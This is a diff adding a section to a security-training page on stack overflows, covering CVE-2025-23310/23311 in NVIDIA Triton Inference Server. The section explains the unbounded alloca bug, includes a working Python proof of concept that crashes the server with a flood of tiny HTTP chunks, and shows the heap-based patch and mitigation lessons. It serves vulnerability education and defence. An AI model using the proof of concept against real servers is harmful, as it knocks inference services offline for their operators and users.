@@ -131,8 +131,72 @@ Even though stack canaries abort the process, an attacker still gains a **Denial
131
131
* Always provide a ** maximum field width** (e.g. ` %511s ` ).
132
132
* Prefer safer alternatives such as ` snprintf ` /` strncpy_s ` .
133
133
134
+ ### Real-World Example: CVE-2025 -23310 & CVE-2025 -23311 (NVIDIA Triton Inference Server)
135
+
136
+ NVIDIA’s Triton Inference Server (≤ v25.06) contained multiple ** stack-based overflows** reachable through its HTTP API.
137
+ The vulnerable pattern repeatedly appeared in ` http_server.cc ` and ` sagemaker_server.cc ` :
138
+
139
+ ``` c
140
+ int n = evbuffer_peek(req->buffer_in, -1 , NULL , NULL , 0 );
141
+ if (n > 0 ) {
142
+ /* allocates 16 * n bytes on the stack */
143
+ struct evbuffer_iovec *v = (struct evbuffer_iovec *)
144
+ alloca (sizeof (struct evbuffer_iovec) * n);
145
+ ...
146
+ }
147
+ ```
148
+
149
+ 1 . ` evbuffer_peek ` (libevent) returns the ** number of internal buffer segments** that compose the current HTTP request body.
150
+ 2 . Each segment causes a ** 16-byte** ` evbuffer_iovec ` to be allocated on the ** stack** via ` alloca() ` – ** without any upper bound** .
151
+ 3 . By abusing ** HTTP _ chunked transfer-encoding_ ** , a client can force the request to be split into ** hundreds-of-thousands of 6-byte chunks** (` "1\r\nA\r\n" ` ). This makes ` n ` grow unbounded until the stack is exhausted.
152
+
153
+ #### Proof-of-Concept (DoS)
154
+ ``` python
155
+ # !/usr/bin/env python3
156
+ import socket, sys
157
+
158
+ def exploit (host = " localhost" , port = 8000 , chunks = 523_800 ):
159
+ s = socket.create_connection((host, port))
160
+ s.sendall((
161
+ f " POST /v2/models/add_sub/infer HTTP/1.1 \r\n "
162
+ f " Host: { host} : { port} \r\n "
163
+ " Content-Type: application/octet-stream\r\n "
164
+ " Inference-Header-Content-Length: 0\r\n "
165
+ " Transfer-Encoding: chunked\r\n "
166
+ " Connection: close\r\n\r\n "
167
+ ).encode())
168
+
169
+ for _ in range (chunks): # 6-byte chunk ➜ 16-byte alloc
170
+ s.send(b " 1\r\n A\r\n " ) # amplification factor ≈ 2.6x
171
+ s.sendall(b " 0\r\n\r\n " ) # end of chunks
172
+ s.close()
173
+
174
+ if __name__ == " __main__" :
175
+ exploit(* sys.argv[1 :])
176
+ ```
177
+ A ~ 3 MB request is enough to overwrite the saved return address and ** crash** the daemon on a default build.
178
+
179
+ #### Patch & Mitigation
180
+ The 25.07 release replaces the unsafe stack allocation with a ** heap-backed ` std::vector ` ** and gracefully handles ` std::bad_alloc ` :
181
+
182
+ ``` c++
183
+ std::vector<evbuffer_iovec> v_vec;
184
+ try {
185
+ v_vec = std::vector<evbuffer_iovec>(n);
186
+ } catch (const std::bad_alloc &e) {
187
+ return TRITONSERVER_ErrorNew(TRITONSERVER_ERROR_INVALID_ARG, "alloc failed");
188
+ }
189
+ struct evbuffer_iovec * v = v_vec.data();
190
+ ```
191
+
192
+ Lessons learned:
193
+ * Never call `alloca()` with attacker-controlled sizes.
194
+ * Chunked requests can drastically change the shape of server-side buffers.
195
+ * Validate / cap any value derived from client input *before* using it in memory allocations.
196
+
134
197
## References
135
198
* [watchTowr Labs – Stack Overflows, Heap Overflows and Existential Dread (SonicWall SMA100)](https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/)
199
+ * [Trail of Bits – Uncovering memory corruption in NVIDIA Triton](https://blog.trailofbits.com/2025/08/04/uncovering-memory-corruption-in-nvidia-triton-as-a-new-hire/)
136
200
137
201
{{#include ../../banners/hacktricks-training.md}}
138
202
0 commit comments